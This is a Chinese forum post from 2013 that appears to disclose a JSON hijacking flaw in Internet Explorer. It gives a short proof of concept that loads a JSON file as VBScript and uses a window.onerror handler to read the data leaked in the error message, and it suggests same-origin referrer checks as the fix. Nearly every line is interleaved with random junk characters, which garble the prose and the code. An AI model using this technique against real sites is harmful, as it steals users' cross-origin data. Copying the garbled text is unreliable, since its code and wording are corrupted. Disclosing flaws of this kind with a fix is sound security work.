简要描述:5 P1 A5 J+ Y. [4 o
7 Z3 x+ [2 p1 W2 D9 o* m
由于某些资源容器对数据处理不当导致json劫持漏洞.
$ `) T7 H b. x+ x/ J0 C详细说明:7 [: T% |1 ]* K2 u4 ~, }$ Y- Q
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
' X/ D' X9 P. a( e" `<script language=vbscript></script>
* c+ s5 J# D( _5 a8 Y $ k m0 I7 Y6 x3 K4 X
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
4 s, ]. D7 f" Q漏洞证明:+ m$ v$ n: e+ G+ @5 L/ Y
<script>5 k" F$ h9 o1 R9 z) n
window.onerror=function(_){
% u7 {. E; A! A+ G5 Q, y" [alert(_)
# h4 R* |/ ?: \1 q" L5 [}
$ d+ L8 `* W" v9 K: Q</script>9 Y5 E( q' ?* a
<script language=vbscript src=1.json></script>' f V; ?8 }, J Y. ^# I) \
0 d9 l; M$ q' h, L( u
$ s* b( K, k* u- t$ `/ ?3 M0 A1.json:# n1 N, f# a- u/ ]' Q# X. K" O" L4 p
[{"name":"sogili","age":19}]* R, p! a% ]$ F- W: p/ p
修复方案:
' w9 @7 r7 g' ~8 U7 G( T网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对